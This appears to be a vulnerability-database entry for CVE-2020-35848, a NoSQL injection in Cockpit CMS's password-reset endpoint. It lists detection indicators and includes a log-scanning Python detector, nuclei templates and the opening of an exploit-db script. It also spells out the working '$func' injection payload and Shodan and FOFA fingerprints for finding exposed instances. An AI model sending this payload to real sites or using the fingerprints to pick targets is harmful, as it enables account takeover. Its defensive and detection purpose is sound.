CVE-2020-35848
Published 2020-12-30
Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php newpassword function.
Priority: P180 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 74.99% (99.4th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| agentejo | cockpit | < 0.11.2 | 0.11.2 |
Detection & IOCs
- url: /auth/newpassword
- command: {"token": {"$func": "var_dump"}}
- other: http.favicon.hash:688609340
- A POST request to /auth/newpassword with a JSON body containing a MongoDB operator key '$func' with value 'var_dump' is the canonical exploit payload for this CVE.
- Successful exploitation produces a response body matching the regex pattern 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"', which is the PHP var_dump output of a reset token prefixed with 'rp-'.
- Shodan fingerprint for Cockpit CMS instances: favicon hash 688609340. Use it to identify exposed targets.
- FOFA fingerprint for Cockpit CMS: icon_hash=688609340 or body contains 'cockpit'.
- All exploit requests use Content-Type: application/json. Inspect POST bodies to /auth/* endpoints for JSON objects containing MongoDB operator keys (e.g., $func, $gt, $ne) as injection indicators.
- The nuclei template targets Cockpit versions prior to 0.12.0; NVD lists the patched version as 0.11.2. Ensure detection coverage spans both version boundaries.
- The exploit script (exploit-db 50185) covers CVE-2020-35847 (requestreset endpoint) AND CVE-2020-35848 (newpassword endpoint) in a single chain, so detections should account for multi-step attack sequences across all three /auth/* endpoints.
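The request and response indicators listed above can be checked together over logged HTTP transactions. The following is an added example, not part of the source page or of any Cockpit or nuclei code; the event dictionary layout, the function names and the sample transactions (including the token value and the /api/example path) are constructed for illustration.

```python
import json
import re

# Response marker quoted on this page: var_dump output of an 'rp-' reset token.
LEAK_RE = re.compile(r'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"')


def operator_keys(value, path=""):
    """Return the dotted path of every JSON object key that starts with '$'."""
    found = []
    if isinstance(value, dict):
        for key, child in value.items():
            here = f"{path}.{key}" if path else key
            if key.startswith("$"):
                found.append(here)
            found.extend(operator_keys(child, here))
    elif isinstance(value, list):
        for i, child in enumerate(value):
            found.extend(operator_keys(child, f"{path}[{i}]"))
    return found


def inspect(event):
    """Return findings for one logged HTTP transaction (hypothetical dict schema)."""
    if event["method"] != "POST" or not event["path"].startswith("/auth/"):
        return []
    try:
        body = json.loads(event["request_body"])
    except (TypeError, ValueError):
        body = None  # not JSON: no operator keys to report
    findings = [f"operator-key:{p}" for p in operator_keys(body)]
    if LEAK_RE.search(event.get("response_body") or ""):
        findings.append("reset-token-leak")
    return findings


# Constructed sample transactions; the token value and /api/example are made up.
SAMPLES = [
    {"method": "POST", "path": "/auth/newpassword",
     "request_body": '{"token": {"$func": "var_dump"}}',
     "response_body": 'string(39) "rp-00000000-aaaa-bbbb-cccc-000000000000"'},
    {"method": "POST", "path": "/auth/newpassword",
     "request_body": '{"token": "rp-00000000-aaaa-bbbb-cccc-000000000000"}',
     "response_body": "<html>reset form</html>"},
    {"method": "POST", "path": "/api/example",
     "request_body": '{"filter": {"published": {"$ne": false}}}',
     "response_body": "[]"},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample["path"], inspect(sample))
```

A transaction that yields both an operator-key finding and reset-token-leak indicates the injection was not only attempted but returned token data, which is the case to escalate first.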
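CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |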
No detection rules found.
Exploit-DB
Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection
exploitdb·2021-08-10·CVSS 9.8
CVE-2020-35848 [CRITICAL] Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection
---
```python
# Exploit Title: Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection
# Date: 06-08-2021
# Exploit Author: Brian Ombongi
# Vendor Homepage: https://getcockpit.com/
# Version: Cockpit 0.11.1
# Tested on: Ubuntu 16.04.7
# CVE : CVE-2020-35847 & CVE-2020-35848
#!/usr/bin/python3
import json
import re
import requests
import random
import string
import argparse

def usage():
    guide = 'python3 exploit.py -u '
    return guide

def arguments():
    parse = argparse.ArgumentParser(usage=usage())
    parse.add_argument('-u', dest='url', help='Site URL e.g http://cockpit.local', type=str, required=True)
    return parse.parse_args()

def test_connection(url):
    try:
        get = requests.get(url)
        if get.status_code ==
```
Nuclei
Agentejo Cockpit <0.12.0 - NoSQL Injection
nuclei·CVSS 9.8
CVE-2020-35848 [CRITICAL] Agentejo Cockpit <0.12.0 - NoSQL Injection
Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.
Template:
```yaml
id: CVE-2020-35848

info:
  name: Agentejo Cockpit <0.12.0 - NoSQL Injection
  author: dwisiswant0
  severity: critical
  description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to manipulate database queries, potentially leading to unauthorized access, data leakage, or data corruption.
  remediation: |
    Upgrade Agentejo Cockpit to version 0.12.0 or
```
Nuclei
Agentejo Cockpit Security Checks
nuclei·CVSS 9.8
CVE-2020-35846 [CRITICAL] Agentejo Cockpit Security Checks
A simple workflow that runs all Agentejo Cockpit related nuclei templates on a given target.
Template:
```yaml
id: cockpit-workflow

info:
  name: Agentejo Cockpit Security Checks
  author: dwisiswant0
  description: A simple workflow that runs all Agentejo Cockpit related nuclei templates on a given target.

workflows:
  - template: http/technologies/cockpit-detect.yaml
    subtemplates:
      - template: http/cves/2020/CVE-2020-35846.yaml
      - template: http/cves/2020/CVE-2020-35847.yaml
      - template: http/cves/2020/CVE-2020-35848.yaml
```
- http://packetstormsecurity.com/files/163762/Cockpit-CMS-0.11.1-NoSQL-Injection.html
- https://getcockpit.com/
- https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466
- https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af
- https://github.com/agentejo/cockpit/commit/79fc9631ffa29146e3124ceaf99879b92e1ef24b